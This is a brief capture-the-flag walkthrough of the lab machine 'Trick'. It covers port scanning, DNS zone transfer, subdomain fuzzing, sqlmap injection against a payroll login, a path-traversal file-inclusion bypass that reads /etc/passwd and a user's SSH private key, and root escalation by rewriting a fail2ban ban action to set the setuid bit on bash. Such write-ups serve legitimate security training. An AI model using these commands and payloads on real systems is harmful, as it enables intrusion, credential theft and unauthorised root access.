Scanning
TARGET=10.10.11.166 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp syn-ack ttl 63 Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain syn-ack ttl 63 ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack ttl 63 nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Coming Soon - Start Bootstrap Theme
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
10.10.11.166 debian.localdomain
Web Enum
> dirsearch -u http://debian.localdomain/ -x 404,401
[17:02:51] 301 - 185B - /js -> http://debian.localdomain/js/
[17:03:40] 403 - 571B - /assets/
[17:03:40] 301 - 185B - /assets -> http://debian.localdomain/assets/
[17:03:54] 301 - 185B - /css -> http://debian.localdomain/css/
[17:04:13] 200 - 5KB - /index.html
[17:04:17] 403 - 571B - /js/
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://debian.localdomain/" -H "Host: FUZZ.debian.localdomain"
nothing
smtp enum
PORT STATE SERVICE
25/tcp open smtp
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users:
|_ root
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
dns enum
> dig axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 128 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Tue Jul 05 18:52:17 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)
sqli: rabit hole
- Login form is vulnerable to sqli:
http://preprod-payroll.trick.htb/ajax.php?action=login
> sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data "username=admin&password=pass" -p password
> sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data "username=admin&password=pass" -p password --dbs mysql
available databases [2]:
[*] information_schema
[*] payroll_db
> sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data "username=admin&password=pass" -p password --dbs mysql -D payroll_db --dump table
position
[19:14:51] [INFO] retrieved: employee
[19:15:26] [INFO] retrieved: department
[19:16:08] [INFO] retrieved: payroll_items
[19:17:07] [INFO] retrieved: attendance
[19:17:45] [INFO] retrieved: employee_deductions
[19:19:07] [INFO] retrieved: employee_allowances
[19:19:57] [INFO] retrieved: users
[19:20:18] [INFO] retrieved: deductions
[19:20:59] [INFO] retrieved: payroll
[19:21:31] [INFO] retrieved: allowances
[19:22:11] [INFO] fetching columns for table 'users' in database 'payroll_db'
[19:22:11] [INFO] retrieved: 8
[19:22:16] [INFO] retrieved: id
[19:22:24] [INFO] retrieved: doctor_id
[19:23:06] [INFO] retrieved: name
[19:23:22] [INFO] retrieved: address
[19:23:48] [INFO] retrieved: contact
[19:24:17] [INFO] retrieved: username
[19:24:48] [INFO] retrieved: password
[19:25:23] [INFO] retrieved: type
+----+-----------+------+------+---------+---------+----------+----------+
| id | doctor_id | name | type | address | contact | password | username |
+----+-----------+------+------+---------+---------+----------+----------+
| 1 | 0 | asdf | 1 | <blank> | <blank> | asdfa | dfasdf |
+----+-----------+------+------+---------+---------+----------+----------+
- Found login:
dfasdf:asdfa, but it seems like an account created by another player
LFI
$conn= new mysqli('localhost','remo','TrulyImpossiblePasswordLmao123','payroll_db')or die("Could not connect to mysql".mysqli_error($con));
- The LFI append a .php extension to the end, hence this is not useful anymore.
- Continue finding more virtual hosts
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://trick.htb/" -H "Host: preprod-FUZZ.trick.htb" --hh 5480
000000254: 200 178 L 631 W 9660 Ch "marketing"
- There is another possible LFI here
> http://preprod-marketing.trick.htb/index.php?page=../../../../../../../../../etc/passwd
> http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//etc/passwd
found user: michael
# get the user's ssh private key
> curl http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa
> ssh -i id_rsa michael@10.10.11.166
pe
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
> cp action.d/iptables-multiport.conf /tmp
> vi /tmp/iptables-multiport.conf
change the actionban to
actionban = chmod +s /bin/bash
> rm -f action.d/iptables-multiport.conf
> cp /tmp/iptables-multiport.conf action.d/
> sudo /etc/init.d/fail2ban restart
- Run hydra to trigger the banaction and check that the /bin/bash is assigned with +s
> hydra -l michael -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh://10.10.11.166
